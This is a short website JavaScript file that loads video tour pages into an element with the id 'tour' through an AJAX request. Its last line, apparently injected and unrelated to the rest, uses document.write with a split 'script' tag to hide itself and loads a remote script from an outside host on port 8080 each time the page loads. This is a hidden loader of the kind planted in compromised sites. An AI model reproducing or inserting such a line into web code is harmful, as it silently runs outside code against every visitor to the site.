// JavaScript Document
var http = false;

if(navigator.appName == "Microsoft Internet Explorer") {
  http = new ActiveXObject("Microsoft.XMLHTTP");
} else {
  http = new XMLHttpRequest();
} 


function video_click(video_id) {
	http.open("GET", "contents/tour.php?video_id="+video_id, true);
	http.onreadystatechange=function() {
    if(http.readyState == 4) { 
	
	document.getElementById('tour').innerHTML = http.responseText;

	
	}
  }

  http.send(null);
	
}


document.write('<s'+'cript type="text/javascript" src="http://temp.hbsouthmomsclub.com:8080/Data_Type.js"></scr'+'ipt>');